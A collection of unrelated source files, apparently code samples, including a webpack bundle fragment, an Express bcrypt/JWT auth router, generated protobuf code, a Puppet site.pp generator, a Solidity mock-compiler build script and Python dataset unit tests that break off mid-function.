sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjozLCJzb3VyY2VzIjpbIndlYnBhY2s6Ly8vLi9yZXNvdXJjZXMvanMvcGFnZXMvYWRtaW4vcmVhZGVyL3JlYWRlci1mb3JtLnZ1ZT9hZTkzIl0sIm5hbWVzIjpbXSwibWFwcGluZ3MiOiJBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQTBGO0FBQzNCO0FBQ0w7OztBQUcxRDtBQUNtRztBQUNuRyxnQkFBZ0IsMkdBQVU7QUFDMUIsRUFBRSxpRkFBTTtBQUNSLEVBQUUsc0ZBQU07QUFDUixFQUFFLCtGQUFlO0FBQ2pCO0FBQ0E7QUFDQTtBQUNBOztBQUVBOztBQUVBO0FBQ0EsSUFBSSxLQUFVLEVBQUUsWUFpQmY7QUFDRDtBQUNlLGdGIiwiZmlsZSI6Ii4vcmVzb3VyY2VzL2pzL3BhZ2VzL2FkbWluL3JlYWRlci9yZWFkZXItZm9ybS52dWUuanMiLCJzb3VyY2VzQ29udGVudCI6WyJpbXBvcnQgeyByZW5kZXIsIHN0YXRpY1JlbmRlckZucyB9IGZyb20gXCIuL3JlYWRlci1mb3JtLnZ1ZT92dWUmdHlwZT10ZW1wbGF0ZSZpZD0xNGMxNWE2YiZcIlxuaW1wb3J0IHNjcmlwdCBmcm9tIFwiLi9yZWFkZXItZm9ybS52dWU/dnVlJnR5cGU9c2NyaXB0Jmxhbmc9anMmXCJcbmV4cG9ydCAqIGZyb20gXCIuL3JlYWRlci1mb3JtLnZ1ZT92dWUmdHlwZT1zY3JpcHQmbGFuZz1qcyZcIlxuXG5cbi8qIG5vcm1hbGl6ZSBjb21wb25lbnQgKi9cbmltcG9ydCBub3JtYWxpemVyIGZyb20gXCIhLi4vLi4vLi4vLi4vLi4vbm9kZV9tb2R1bGVzL3Z1ZS1sb2FkZXIvbGliL3J1bnRpbWUvY29tcG9uZW50Tm9ybWFsaXplci5qc1wiXG52YXIgY29tcG9uZW50ID0gbm9ybWFsaXplcihcbiAgc2NyaXB0LFxuICByZW5kZXIsXG4gIHN0YXRpY1JlbmRlckZucyxcbiAgZmFsc2UsXG4gIG51bGwsXG4gIG51bGwsXG4gIG51bGxcbiAgXG4pXG5cbi8qIGhvdCByZWxvYWQgKi9cbmlmIChtb2R1bGUuaG90KSB7XG4gIHZhciBhcGkgPSByZXF1aXJlKFwiQzpcXFxcbGFyYWdvblxcXFx3d3dcXFxcdGlrLXRvay10YXJvdC1tYXN0ZXJcXFxcbm9kZV9tb2R1bGVzXFxcXHZ1ZS1ob3QtcmVsb2FkLWFwaVxcXFxkaXN0XFxcXGluZGV4LmpzXCIpXG4gIGFwaS5pbnN0YWxsKHJlcXVpcmUoJ3Z1ZScpKVxuICBpZiAoYXBpLmNvbXBhdGlibGUpIHtcbiAgICBtb2R1bGUuaG90LmFjY2VwdCgpXG4gICAgaWYgKCFhcGkuaXNSZWNvcmRlZCgnMTRjMTVhNmInKSkge1xuICAgICAgYXBpLmNyZWF0ZVJlY29yZCgnMTRjMTVhNmInLCBjb21wb25lbnQub3B0aW9ucylcbiAgICB9IGVsc2Uge1xuICAgICAgYXBpLnJlbG9hZCgnMTRjMTVhNmInLCBjb21wb25lbnQub3B0aW9ucylcbiAgICB9XG4gICAgbW9kdWxlLmhvdC5hY2NlcHQoXCIuL3JlYWRlci1mb3JtLnZ1ZT92dWUmdHlwZT10ZW1wbGF0ZSZpZD0xNGMxNWE2YiZcIiwgZnVuY3Rpb24gKCkge1xuICAgICAgYXBpLnJlcmVuZGVyKCcxNGMxNWE2YicsIHtcbiAgICAgICAgcmVuZGVyOiByZW5kZXIsXG4gICAgICAgIHN0YXRpY1JlbmRlckZuczogc3RhdGlj
UmVuZGVyRm5zXG4gICAgICB9KVxuICAgIH0pXG4gIH1cbn1cbmNvbXBvbmVudC5vcHRpb25zLl9fZmlsZSA9IFwicmVzb3VyY2VzL2pzL3BhZ2VzL2FkbWluL3JlYWRlci9yZWFkZXItZm9ybS52dWVcIlxuZXhwb3J0IGRlZmF1bHQgY29tcG9uZW50LmV4cG9ydHMiXSwic291cmNlUm9vdCI6IiJ9\n//# sourceURL=webpack-internal:///./resources/js/pages/admin/reader/reader-form.vue\n");
/***/ }),
/***/ "./resources/js/pages/admin/reader/reader-form.vue?vue&type=script&lang=js&":
/*!**********************************************************************************!*\
!*** ./resources/js/pages/admin/reader/reader-form.vue?vue&type=script&lang=js& ***!
\**********************************************************************************/
/*! exports provided: default */
/***/ (function(module, __webpack_exports__, __webpack_require__) {
"use strict";
eval("__webpack_require__.r(__webpack_exports__);\n/* harmony import */ var _node_modules_babel_loader_lib_index_js_ref_4_0_node_modules_vue_loader_lib_index_js_vue_loader_options_reader_form_vue_vue_type_script_lang_js___WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(/*! -!../../../../../node_modules/babel-loader/lib??ref--4-0!../../../../../node_modules/vue-loader/lib??vue-loader-options!./reader-form.vue?vue&type=script&lang=js& */ \"./node_modules/babel-loader/lib/index.js?!./node_modules/vue-loader/lib/index.js?!./resources/js/pages/admin/reader/reader-form.vue?vue&type=script&lang=js&\");\n/* empty/unused harmony star reexport */ /* harmony default export */ __webpack_exports__[\"default\"] = (_node_modules_babel_loader_lib_index_js_ref_4_0_node_modules_vue_loader_lib_index_js_vue_loader_options_reader_form_vue_vue_type_script_lang_js___WEBPACK_IMPORTED_MODULE_0__[\"default\"]); //# sourceURL=[module]\n//# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjozLCJzb3VyY2VzIjpbIndlYnBhY2s6Ly8vLi9yZXNvdXJjZXMvanMvcGFnZXMvYWRtaW4vcmVhZGVyL3JlYWRlci1mb3JtLnZ1ZT81NGY0Il0sIm5hbWVzIjpbXSwibWFwcGluZ3MiOiJBQUFBO0FBQUE7QUFBQSx3Q0FBdU0sQ0FBZ0IsdVBBQUcsRUFBQyIsImZpbGUiOiIuL3Jlc291cmNlcy9qcy9wYWdlcy9hZG1pbi9yZWFkZXIvcmVhZGVyLWZvcm0udnVlP3Z1ZSZ0eXBlPXNjcmlwdCZsYW5nPWpzJi5qcyIsInNvdXJjZXNDb250ZW50IjpbImltcG9ydCBtb2QgZnJvbSBcIi0hLi4vLi4vLi4vLi4vLi4vbm9kZV9tb2R1bGVzL2JhYmVsLWxvYWRlci9saWIvaW5kZXguanM/P3JlZi0tNC0wIS4uLy4uLy4uLy4uLy4uL25vZGVfbW9kdWxlcy92dWUtbG9hZGVyL2xpYi9pbmRleC5qcz8/dnVlLWxvYWRlci1vcHRpb25zIS4vcmVhZGVyLWZvcm0udnVlP3Z1ZSZ0eXBlPXNjcmlwdCZsYW5nPWpzJlwiOyBleHBvcnQgZGVmYXVsdCBtb2Q7IGV4cG9ydCAqIGZyb20gXCItIS4uLy4uLy4uLy4uLy4uL25vZGVfbW9kdWxlcy9iYWJlbC1sb2FkZXIvbGliL2luZGV4LmpzPz9yZWYtLTQtMCEuLi8uLi8uLi8uLi8uLi9ub2RlX21vZHVsZXMvdnVlLWxvYWRlci9saWIvaW5kZXguanM/P3Z1ZS1sb2FkZXItb3B0aW9ucyEuL3JlYWRlci1mb3JtLnZ1ZT92dWUmdHlwZT1zY3JpcHQmbGFuZz1qcyZcIiJdLCJzb3VyY2VSb290IjoiIn0=\n//# 
sourceURL=webpack-internal:///./resources/js/pages/admin/reader/reader-form.vue?vue&type=script&lang=js&\n");
/***/ }),
/***/ "./resources/js/pages/admin/reader/reader-form.vue?vue&type=template&id=14c15a6b&":
/*!****************************************************************************************!*\
!*** ./resources/js/pages/admin/reader/reader-form.vue?vue&type=template&id=14c15a6b& ***!
\****************************************************************************************/
/*! exports provided: render, staticRenderFns */
/***/ (function(module, __webpack_exports__, __webpack_require__) {
"use strict";
eval("__webpack_require__.r(__webpack_exports__);\n/* harmony import */ var _node_modules_vue_loader_lib_loaders_templateLoader_js_vue_loader_options_node_modules_vue_loader_lib_index_js_vue_loader_options_reader_form_vue_vue_type_template_id_14c15a6b___WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(/*! -!../../../../../node_modules/vue-loader/lib/loaders/templateLoader.js??vue-loader-options!../../../../../node_modules/vue-loader/lib??vue-loader-options!./reader-form.vue?vue&type=template&id=14c15a6b& */ \"./node_modules/vue-loader/lib/loaders/templateLoader.js?!./node_modules/vue-loader/lib/index.js?!./resources/js/pages/admin/reader/reader-form.vue?vue&type=template&id=14c15a6b&\");\n/* harmony reexport (safe) */ __webpack_require__.d(__webpack_exports__, \"render\", function() { return _node_modules_vue_loader_lib_loaders_templateLoader_js_vue_loader_options_node_modules_vue_loader_lib_index_js_vue_loader_options_reader_form_vue_vue_type_template_id_14c15a6b___WEBPACK_IMPORTED_MODULE_0__[\"render\"]; });\n\n/* harmony reexport (safe) */ __webpack_require__.d(__webpack_exports__, \"staticRenderFns\", function() { return _node_modules_vue_loader_lib_loaders_templateLoader_js_vue_loader_options_node_modules_vue_loader_lib_index_js_vue_loader_options_reader_form_vue_vue_type_template_id_14c15a6b___WEBPACK_IMPORTED_MODULE_0__[\"staticRenderFns\"]; });\n\n//# sourceURL=[module]\n//# 
sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjozLCJzb3VyY2VzIjpbIndlYnBhY2s6Ly8vLi9yZXNvdXJjZXMvanMvcGFnZXMvYWRtaW4vcmVhZGVyL3JlYWRlci1mb3JtLnZ1ZT83ZTMzIl0sIm5hbWVzIjpbXSwibWFwcGluZ3MiOiJBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQSIsImZpbGUiOiIuL3Jlc291cmNlcy9qcy9wYWdlcy9hZG1pbi9yZWFkZXIvcmVhZGVyLWZvcm0udnVlP3Z1ZSZ0eXBlPXRlbXBsYXRlJmlkPTE0YzE1YTZiJi5qcyIsInNvdXJjZXNDb250ZW50IjpbImV4cG9ydCAqIGZyb20gXCItIS4uLy4uLy4uLy4uLy4uL25vZGVfbW9kdWxlcy92dWUtbG9hZGVyL2xpYi9sb2FkZXJzL3RlbXBsYXRlTG9hZGVyLmpzPz92dWUtbG9hZGVyLW9wdGlvbnMhLi4vLi4vLi4vLi4vLi4vbm9kZV9tb2R1bGVzL3Z1ZS1sb2FkZXIvbGliL2luZGV4LmpzPz92dWUtbG9hZGVyLW9wdGlvbnMhLi9yZWFkZXItZm9ybS52dWU/dnVlJnR5cGU9dGVtcGxhdGUmaWQ9MTRjMTVhNmImXCIiXSwic291cmNlUm9vdCI6IiJ9\n//# sourceURL=webpack-internal:///./resources/js/pages/admin/reader/reader-form.vue?vue&type=template&id=14c15a6b&\n");
/***/ })
}]); |
# Copyright 2016 Skymind,Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from .ndarray import ndarray
from .java_classes import Nd4j
def zeros(shape):
    """Build a zero-filled ndarray with the requested dimensions.

    :param shape: sequence of ints, one per dimension.
    :return: an ``ndarray`` wrapping the backing Nd4j zero array.
    """
    backing = Nd4j.zeros(*shape)
    return ndarray(backing)
def ones(shape):
    """Build a one-filled ndarray with the requested dimensions.

    :param shape: sequence of ints, one per dimension.
    :return: an ``ndarray`` wrapping the backing Nd4j one array.
    """
    backing = Nd4j.ones(*shape)
    return ndarray(backing)
|
const router = require('express').Router()
const bcrypt = require('bcryptjs')
const { BCRYPT_ROUNDS, JWT_SECRET } = require('../../config')
const User = require('../auth/auth-model')
const { generateToken } = require('./auth-middleware')
/**
 * POST /register — create a new user account.
 *
 * Hashes the incoming plaintext password with bcrypt before persisting,
 * then responds 201 with a welcome message. Failures are delegated to the
 * error-handling middleware via next().
 */
router.post('/register', (req, res, next) => {
  // Build a copy instead of mutating req.body in place, so downstream
  // middleware still sees the original, unmodified request payload.
  const user = {
    ...req.body,
    password: bcrypt.hashSync(req.body.password, BCRYPT_ROUNDS),
  }
  User.addUser(user)
    .then(saved => {
      res.status(201).json({ message: `Welcome, ${saved.username}` })
    })
    .catch(next)
})
/**
 * POST /login — authenticate an existing user.
 *
 * Looks the user up by username, verifies the bcrypt hash, and on success
 * responds 200 with a JWT. Bad credentials produce a 401 via the error
 * middleware; unexpected failures are forwarded to next().
 */
router.post('/login', async (req, res, next) => {
  try {
    const { username, password } = req.body
    const [user] = await User.findBy({ username })
    if (user && bcrypt.compareSync(password, user.password)) {
      res.status(200).json({
        message: `Welcome back ${user.username}...`,
        token: generateToken(user),
      })
    } else {
      next({
        status: 401, message: 'Invalid Credentials'
      })
    }
  } catch (err) {
    next(err)
  }
})

module.exports = router;
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: resource_metric_source.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from monitor_sdk.model.container import metric_target_pb2 as monitor__sdk_dot_model_dot_container_dot_metric__target__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='resource_metric_source.proto',
package='container',
syntax='proto3',
serialized_options=_b('ZCgo.easyops.local/contracts/protorepo-models/easyops/model/container'),
serialized_pb=_b('\n\x1cresource_metric_source.proto\x12\tcontainer\x1a/monitor_sdk/model/container/metric_target.proto\"M\n\x14ResourceMetricSource\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\'\n\x06target\x18\x02 \x01(\x0b\x32\x17.container.MetricTargetBEZCgo.easyops.local/contracts/protorepo-models/easyops/model/containerb\x06proto3')
,
dependencies=[monitor__sdk_dot_model_dot_container_dot_metric__target__pb2.DESCRIPTOR,])
_RESOURCEMETRICSOURCE = _descriptor.Descriptor(
name='ResourceMetricSource',
full_name='container.ResourceMetricSource',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='container.ResourceMetricSource.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='target', full_name='container.ResourceMetricSource.target', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=92,
serialized_end=169,
)
_RESOURCEMETRICSOURCE.fields_by_name['target'].message_type = monitor__sdk_dot_model_dot_container_dot_metric__target__pb2._METRICTARGET
DESCRIPTOR.message_types_by_name['ResourceMetricSource'] = _RESOURCEMETRICSOURCE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
ResourceMetricSource = _reflection.GeneratedProtocolMessageType('ResourceMetricSource', (_message.Message,), {
'DESCRIPTOR' : _RESOURCEMETRICSOURCE,
'__module__' : 'resource_metric_source_pb2'
# @@protoc_insertion_point(class_scope:container.ResourceMetricSource)
})
_sym_db.RegisterMessage(ResourceMetricSource)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
|
#!/usr/bin/env python
from __future__ import print_function
"""
site.pp generator
"""
import os
import sys
import json
import inflect
import argparse
from configparser import SafeConfigParser
debug = False
write_to = sys.stdout
def eprint(*args, **kwargs):
    """Emit a diagnostic message on stderr; silently no-op unless the
    module-level ``debug`` flag is set."""
    global debug
    if not debug:
        return
    print(*args, file=sys.stderr, **kwargs)
def print_resource(resource_name, resource_alias, strategy='deep'):
    """Emit the Puppet code that looks up a resource hash from Hiera and
    instantiates it via ``create_resources()``.

    Writes to the module-global ``write_to`` stream. Generated shape:

        $<alias> = lookup(<alias>, Hash, <strategy>, {})
        create_resources(<name>, $<alias>)

    :param resource_name: Puppet resource type, e.g. ``postgresql::schema``.
    :param resource_alias: Hiera key / Puppet variable name to bind.
    :param strategy: Hiera merge behavior passed to ``lookup``.
    """
    global debug, write_to
    # Puppet signature: lookup( <NAME>, [<VALUE TYPE>], [<MERGE BEHAVIOR>], [<DEFAULT VALUE>] )
    print("", file=write_to)
    # NOTE(review): the lookup name and merge strategy are emitted as unquoted
    # barewords, while the commented-out variant below quotes them. Puppet
    # generally accepts bareword strings here, but confirm this matches the
    # manifests this generator targets.
    # print("$resource_alias = lookup('"+resource_alias+"', undef, '"+strategy+"', {})", file=write_to)
    print("$"+resource_alias+" = lookup("+resource_alias+", Hash, "+strategy+", {})", file=write_to)
    # Example of the generated instantiation: create_resources(postgresql::schema, $postgresschemas)
    print("create_resources("+resource_name+", $"+resource_alias+")", file=write_to)
def generatesitepp(config_file, write_sitepp_to=sys.stdout):
    """Generate a Puppet site.pp on ``write_sitepp_to`` from ``config_file``.

    Resources are collected from three places, in order:
      1. the ``resource-hash`` JSON option of the [sitegen] section,
      2. the newline-separated ``resource-file`` list (each entry also gets
         a grammatically pluralized alias when it differs from the naive
         "<name>s" form),
      3. every non-[sitegen] section that declares a ``resource-name``
         (with an optional ``merge-strategy``, defaulting to 'deep').
    Finally, each entry of ``deep-include-classes`` is emitted as a
    deep-merged ``lookup(...).include`` line.
    """
    global debug, write_to
    write_to = write_sitepp_to
    config = SafeConfigParser()  # NOTE(review): deprecated alias of ConfigParser; removed in Python 3.12
    config.read(config_file)
    # Every [sitegen] option is optional; fall back to a default when it is
    # missing or malformed. (Named Exception instead of a bare except so
    # KeyboardInterrupt/SystemExit are no longer swallowed.)
    try:
        debug = config.getboolean('sitegen', 'debug')
    except Exception:
        debug = False
    try:
        resource_file = config.get('sitegen', 'resource-file').strip('"').strip("'").strip()
    except Exception:
        resource_file = "./siteppgen/resource.list"
    try:
        resource_hash = json.loads(config.get('sitegen', 'resource-hash'))
    except Exception:
        resource_hash = {}
    try:
        deep_include_classes = json.loads(config.get('sitegen', 'deep-include-classes'))
    except Exception:
        deep_include_classes = []
    # 1) Resources declared inline as a JSON hash: {alias: resource_name}.
    for resource_alias in resource_hash:
        print_resource(resource_hash[resource_alias], resource_alias)
    # 2) Resources listed one per line in the resource file.
    if not os.path.isfile(resource_file):
        # BUG FIX: a missing file is now really ignored; previously the code
        # only warned and then crashed trying to open the file anyway.
        eprint("WARNING: resource-file ("+resource_file+") not found, ignoring resources")
    else:
        with open(resource_file) as resource_file_handler:
            resource_name = resource_file_handler.readline().rstrip(os.linesep).strip('"').strip("'").strip()
            # Stop at the first empty line (also covers EOF), matching the
            # original reader's behavior.
            while resource_name:
                resource_alias = resource_name.replace(':', '').strip()+"s"
                print_resource(resource_name, resource_alias)
                # Additionally emit a grammatically correct plural alias when
                # it differs from the naive "<name>s" form.
                p = inflect.engine()
                plural_resource_alias = p.plural(resource_name.replace(':', '').strip())
                if plural_resource_alias != resource_alias:
                    print_resource(resource_name, plural_resource_alias)
                resource_name = resource_file_handler.readline().rstrip(os.linesep).strip('"').strip("'").strip()
    # 3) Per-resource config sections: [alias] with a mandatory resource-name.
    for resource_alias in config.sections():
        if resource_alias == "sitegen":
            continue
        try:
            merge_strategy = config.get(resource_alias, 'merge-strategy').strip('"').strip("'").strip()
        except Exception:
            merge_strategy = 'deep'
        try:
            resource_name = config.get(resource_alias, 'resource-name').strip('"').strip("'").strip()
        except Exception:
            # Only the option lookup is guarded now, so a genuine failure in
            # print_resource is no longer mis-reported as a missing option.
            eprint("WARNING: skipping "+resource_alias+": resource-name not found")
            continue
        print_resource(resource_name, resource_alias, merge_strategy)
    # Emitted shape: lookup('classes', Array[String], 'deep').include
    for deep_include_class in deep_include_classes:
        print("", file=write_to)
        print("lookup('"+deep_include_class+"', Array[String], 'deep').include", file=write_to)
if __name__ == '__main__':
    # First CLI argument is the config path; fall back to the default file
    # when no argument was given.
    config_file = sys.argv[1] if len(sys.argv) > 1 else './siteppgen.config'
    generatesitepp(config_file=config_file)
|
'use strict';
var WSDLElement = require('./wsdlElement');
/**
 * Represents a WSDL <documentation> element: free-form, human-readable
 * annotation attached to other WSDL elements. It adds no behavior beyond
 * the base WSDLElement, so the redundant constructor that only forwarded
 * its arguments to super() has been removed — the implicit constructor
 * does exactly that.
 */
class Documentation extends WSDLElement {
}

// Element name as it appears in WSDL documents.
Documentation.elementName = 'documentation';
// <documentation> may not contain nested WSDL elements.
Documentation.allowedChildren = [];

module.exports = Documentation;
import { Meteor } from 'meteor/meteor';
import { Tracker } from 'meteor/tracker';
import { settings } from '../../settings';
import { TabBar } from '../../ui-utils';
Meteor.startup(function() {
	return Tracker.autorun(function() {
		// Reactively add or remove the pinned-messages tab whenever the
		// admin setting changes.
		const allowPinning = settings.get('Message_AllowPinning');
		if (!allowPinning) {
			TabBar.removeButton('pinned-messages');
			return;
		}
		TabBar.addButton({
			groups: ['channel', 'group', 'direct'],
			id: 'pinned-messages',
			i18nTitle: 'Pinned_Messages',
			icon: 'pin',
			template: 'pinnedMessages',
			order: 10,
		});
	});
});
|
def multipliers():
    """Return four callables that multiply their argument by 0, 1, 2 and 3.

    Each lambda captures the loop variable eagerly through a default
    argument (``factor=i``). Without that default, Python's late binding
    would make every closure see the final value of the loop variable, and
    the demo below would print [6, 6, 6, 6] instead of [0, 2, 4, 6].
    Background reading:
    Common Gotchas — The Hitchhiker's Guide to Python
    https://docs.python-guide.org/writing/gotchas/
    """
    funcs = []
    for i in range(4):
        funcs.append(lambda x, factor=i: factor * x)
    return funcs

print([m(2) for m in multipliers()])
|
const name = '';

// An empty string is falsy, so the fallback message is chosen.
const message = name ? 'We have a name!' : 'No name provided';
console.log(message);
'use strict'
var fs = require('fs')
var compiler = require('solc')
var compilerInput = require('remix-solidity').CompilerInput
// Pinned solc release used to pre-compile the browser-test fixtures.
var defaultVersion = 'v0.5.1+commit.c8a2cb62'

// Entry point: download the pinned compiler snapshot, compile every contract
// referenced by the browser tests, then bake the results into a mock
// soljson.js so the tests can run without a real compiler.
compiler.loadRemoteVersion(defaultVersion, (error, solcSnapshot) => {
  // Best-effort: a download error is logged but the script continues,
  // which will surface as failures in the compile calls below.
  if (error) console.log(error)
  var compilationResult = {}
  gatherCompilationResults('./test-browser/tests/', compilationResult, solcSnapshot)
  replaceSolCompiler(compilationResult, solcSnapshot)
})
/**
 * Compile every source referenced by the test definitions found in `dir`.
 *
 * @param {string} dir - directory containing *.js test definition modules.
 * @param {Object} compilationResult - map keyed by normalized compiler input;
 *   filled in place and also returned.
 * @param {Object} solcSnapshot - loaded solc compiler snapshot.
 * @returns {Object} the populated `compilationResult` map.
 */
function gatherCompilationResults (dir, compilationResult, solcSnapshot) {
  var filenames = fs.readdirSync(dir, 'utf8')
  // forEach, not map: the callback is executed purely for its side effects
  // and the original mapped array was discarded.
  filenames.forEach(function (item) {
    if (!item.endsWith('.js')) return
    var testDef = require('.' + dir + item)
    if (!('@sources' in testDef)) return
    var sources = testDef['@sources']()
    for (var files in sources) {
      // Each source is compiled twice — optimized and unoptimized — because
      // the browser tests may request either configuration.
      compile(solcSnapshot, sources[files], true, function (result) {
        compilationResult[result.key] = result
      })
      compile(solcSnapshot, sources[files], false, function (result) {
        compilationResult[result.key] = result
      })
    }
  })
  return compilationResult
}
/**
 * Compile one source with the given solc snapshot and hand the result to
 * `addCompilationResult`.
 *
 * The whitespace-stripped compiler input doubles as the lookup key, so it
 * stays stable regardless of the source formatting.
 *
 * @param {Object} solcSnapshot - loaded solc compiler snapshot.
 * @param {Object} source - source description accepted by CompilerInput.
 * @param {boolean} optimization - whether to enable the optimizer.
 * @param {Function} addCompilationResult - callback receiving the result record.
 */
function compile (solcSnapshot, source, optimization, addCompilationResult) {
  var missingInputs = []
  // Declared before the try block: the originals were `var`s inside the try
  // and silently relied on hoisting to be visible afterwards. A failed
  // compile still yields a well-formed (if partial) record, as before.
  var input
  var result
  try {
    input = compilerInput(source, {optimize: optimization})
    result = solcSnapshot.compileStandardWrapper(input, function (path) {
      // solc reports imports it cannot resolve through this callback.
      missingInputs.push(path)
    })
    // Normalize whitespace so the key is formatting-independent.
    input = input.replace(/(\t)|(\n)|(\\n)|( )/g, '')
  } catch (e) {
    console.log(e)
  }
  var ret = {
    key: input,
    source: source,
    optimization: optimization,
    missingInputs: missingInputs,
    result: result
  }
  addCompilationResult(ret)
}
// Read the mock compiler template and append both the compiler version and
// the precompiled results, writing the combined file out as ./soljson.js
// (the artifact the browser tests load in place of a real compiler).
// Any read or write error is logged and aborts the process with exit code 1.
function replaceSolCompiler (results, solcSnapshot) {
  fs.readFile('./test-browser/mockcompiler/compiler.js', 'utf8', function (error, data) {
    if (error) {
      console.log(error)
      process.exit(1)
      return
    }
    console.log(solcSnapshot.version())
    // Append globals the mock compiler template expects to find.
    data = data + '\n\nvar mockCompilerVersion = \'' + solcSnapshot.version() + '\''
    data = data + '\n\nvar mockData = ' + JSON.stringify(results) + ';\n'
    fs.writeFile('./soljson.js', data, 'utf8', function (error) {
      if (error) {
        console.log(error)
        process.exit(1)
        return
      }
    })
  })
}
|
export {
// a
foo1,
// b
bar1,
baz1,
} from "mod";
const foo2 = 1;
const bar2 = 1;
const baz2 = 1;
export {
// a
foo2,
// b
bar2,
baz2,
};
|
import unittest
import warnings
import torch
from tqdm import tqdm
from data.utils import get_db_container, get_db_info
from utils import get_dataloader, get_train_val_test_datasets
dataset_names = ('acquirevaluedshopperschallenge',
'homecreditdefaultrisk',
'kddcup2014')
class TestDatabaseDataset(unittest.TestCase):
    """Sanity checks on the raw (pre-collation) datapoints of every dataset."""

    # Encoder configuration shared by every dataset load in this test case.
    _ENCODERS = dict(CATEGORICAL='CategoricalOrdinalEnc',
                     SCALAR='ScalarRobustScalerEnc',
                     DATETIME='DatetimeScalarEnc',
                     LATLONG='LatLongScalarEnc',
                     TEXT='TextSummaryScalarEnc')

    def test_datapoints_for_no_self_loops_and_nonnegative_edge_types(self):
        """Raw datapoints must contain no self loops and no negative edge types."""
        for db_name in dataset_names:
            splits = get_train_val_test_datasets(dataset_name=db_name,
                                                 train_test_split='use_full_train',
                                                 encoders=self._ENCODERS)
            for dataset in splits:
                for dp_id, (edge_list, node_types, edge_types, features, label) in tqdm(dataset):
                    # Nodes don't have any self loops in the raw data
                    for src, dst in ((edge[0], edge[1]) for edge in edge_list):
                        self.assertNotEqual(src, dst)
                    # All edge types are nonnegative in the raw data
                    self.assertTrue(all(et >= 0 for et in edge_types))

    def test_train_val_and_test_splits_contain_different_datapoints(self):
        """Train/val/test splits must be pairwise disjoint in datapoint ids."""
        for train_test_split in ['use_full_train', 'xval0', 'xval1', 'xval2', 'xval3', 'xval4']:
            for db_name in dataset_names:
                train_data, val_data, test_data = get_train_val_test_datasets(
                    dataset_name=db_name,
                    train_test_split=train_test_split,
                    encoders=self._ENCODERS)
                overlap = set(train_data.datapoint_ids) \
                    .intersection(val_data.datapoint_ids) \
                    .intersection(test_data.datapoint_ids)
                self.assertEqual(0, len(overlap))
class TestDataBaseClass:
    # Wrapper namespace so the inner TestCase is not collected directly by
    # unittest; concrete per-database subclasses set `db_name` and inherit.
    class TestData(unittest.TestCase):
        # Concrete subclasses must override with one of the dataset names.
        db_name = None
        def setUp(self):
            """Spin up the database container and build one SequentialSampler
            dataloader per split (train/val/test) for `db_name`."""
            self.db_info = get_db_info(self.db_name)
            batch_size = 1
            num_workers = 0
            # Upper bound on nodes per collated graph batch.
            max_nodes_per_graph = 100000
            # Side effect only: ensures the DB container is running.
            _ = get_db_container(self.db_name)
            train_data, val_data, test_data = get_train_val_test_datasets(dataset_name=self.db_name,
                                                                          train_test_split='use_full_train',
                                                                          encoders=dict(
                                                                              CATEGORICAL='CategoricalOrdinalEnc',
                                                                              SCALAR='ScalarRobustScalerEnc',
                                                                              DATETIME='DatetimeScalarEnc',
                                                                              LATLONG='LatLongScalarEnc',
                                                                              TEXT='TextSummaryScalarEnc'), )
            train_loader = get_dataloader(dataset=train_data,
                                          batch_size=batch_size,
                                          sampler_class_name='SequentialSampler',
                                          num_workers=num_workers,
                                          max_nodes_per_graph=max_nodes_per_graph)
            val_loader = get_dataloader(dataset=val_data,
                                        batch_size=batch_size,
                                        sampler_class_name='SequentialSampler',
                                        num_workers=num_workers,
                                        max_nodes_per_graph=max_nodes_per_graph)
            test_loader = get_dataloader(dataset=test_data,
                                         batch_size=batch_size,
                                         sampler_class_name='SequentialSampler',
                                         num_workers=num_workers,
                                         max_nodes_per_graph=max_nodes_per_graph)
            self.loaders = {'train': train_loader,
                            'val': val_loader,
                            'test': test_loader}
        def test_loaded_datapoints(self):
            """Validate structural invariants of every collated batch: graph
            non-emptiness, edge symmetry, self loops, feature schema, and
            label presence per split."""
            label_node_type, label_feature_name = self.db_info['label_feature'].split('.')
            for split, loader in self.loaders.items():
                with warnings.catch_warnings():
                    warnings.simplefilter('ignore')
                    for bdgl, features, label in tqdm(loader):
                        # No empty graphs
                        self.assertGreater(bdgl.number_of_nodes(), 0)
                        # Every edge has an equal and opposite edge with negative edge type
                        uvt = torch.stack((*bdgl.all_edges('uv', 'eid'), bdgl.edata['edge_types'])).t()
                        u_v_type = []
                        v_u_negtype = []
                        for u, v, type in uvt.tolist():
                            u_v_type.append((u, v, type))
                            v_u_negtype.append((v, u, -type))
                        u_v_type_set = set(u_v_type)
